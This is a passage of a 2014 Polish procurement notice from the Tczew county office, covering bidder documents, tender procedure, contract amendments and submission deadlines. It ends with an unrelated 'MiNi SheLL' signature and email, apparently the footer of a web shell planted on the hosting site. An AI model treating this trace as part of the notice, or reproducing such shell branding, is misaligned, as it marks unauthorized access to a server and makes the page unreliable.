<p>5.1.6	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy będzie polegać na zasobach podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy, w celu oceny, iż będzie dysponował tymi zasobami niezbędnymi do realizacji zamówienia, Wykonawca winien przedstawić w szczególności pisemne zobowiązania tych podmiotów (przedstawione w oryginale) do oddania mu do dyspozycji zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zamawiający wymaga, aby składany dokument w szczególności zawierał informacje: - jaki rodzaj zasobu jest udostępniany, - w jakiej formie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia (np. podwykonawstwo, konsultacje itp.), - w jakim okresie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia, - jaki stosunek łączy Wykonawcę z podmiotem udostępniającym zasób (np. umowa zlecenie, umowa o współprace itp.).5.2.4	Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 5.2.3 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. UWAGA: Przed podpisaniem umowy Wykonawca zobowiązany jest do dostarczenia Zamawiającemu następujących dokumentów:
1)	potwierdzających posiadanie wymaganych uprawnień do pełnienia samodzielnych funkcji w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa przez osoby, które będą uczestniczyć w realizacji zamówienia, wymienione w Załączniku Nr 1E do SIWZ;
2)	aktualnych zaświadczeń lekarskich dopuszczających osoby wymienione w Wykazie osób tj. Załączniku Nr 1E do SIWZ do pracy na wysokościach;
3)	umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenia zamówienia - jeżeli najkorzystniejszą ofertą okaże się oferta złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia

Wzór treści zobowiązania stanowi Załącznik Nr 1G do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany postanowień niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności w następujących przypadkach:
1)	Zmiany osoby sprawującej nadzór inwestorski - polegającą na wyznaczeniu nowej osoby pełniącej daną funkcję, pod warunkiem, zgodności z postanowieniami SIWZ.
2)	Zmiany/przedłużenia terminu wykonania robót w przypadku gdy taka zmiana zostanie przyjęta w umowie między Zamawiającym a wykonawca robót budowlanych.
3)	Konieczności zmiany podatku VAT, w związku ze zmianą powszechnie obowiązujących przepisów prawa.
2.	Wykonawca jest zobowiązany do pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> przetargi.powiat.tczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Tczewie, woj. pomorskie kod 83-110, ulica Piaskowa 2, pok. nr 319..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2014 godzina 12:00, miejsce: Starostwo Powiatowe w Tczewie, woj. pomorskie, kod: 83-110, ulica Piaskowa 2, w Biurze Obsługi Klienta w pokoju nr 04..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com